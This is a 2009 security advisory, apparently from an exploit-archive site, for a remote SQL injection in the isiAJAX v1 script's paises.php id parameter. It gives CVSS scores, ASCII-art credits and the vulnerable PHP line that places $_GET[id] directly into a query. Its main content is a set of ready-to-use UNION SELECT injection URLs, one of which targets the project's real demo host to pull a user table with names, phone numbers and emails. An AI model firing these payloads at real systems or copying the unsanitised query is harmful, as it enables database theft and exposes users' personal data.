isiAJAX v1 (praises.php id) Remote SQL Injection Vulnerability

2009.03.14
Credit: dun
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ dun[at]strcpy.pl ] ################################################### # [ isiAJAX v1 ] SQL Injection Vulnerability # ################################################### # # Script: "isiAJAX v1" # # Script site: http://isiajax.sourceforge.net/ # Download: http://sourceforge.net/project/showfiles.php?group_id=169754 # # [SQL] Vuln: http://site.com/isiAJAX/ejemplo/paises.php?id=-1+UNION+SELECT+1,USER()-- # http://isiajax.sourceforge.net/demos/practicos/busqueda/paises.php?id=-1+UNION+SELECT+1,CONCAT_WS(char(58),id,nombre,apellidos,id_pais,edad,telefono,email)+from+usuarios-- # # Bug: ./isiAJAX/ejemplo/paises.php (linez: 10-14) # # ... # $paise = mysql_query("SELECT id, nombre FROM pais WHERE id_continente=$_GET[id]", $conexion); // # while ($paises = mysql_fetch_row($paise)) { // SQL inj. # ?> <option value="<?=$paises[0];?>"><?=$paises[1];?></option> // # <? # } # ... # # ############################################### # Greetz: D3m0n_DE * str0ke * and otherz.. ############################################### [ dun / 2009 ] *******************************************************************************************

References:

http://xforce.iss.net/xforce/xfdb/49113
http://www.milw0rm.com/exploits/8167


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top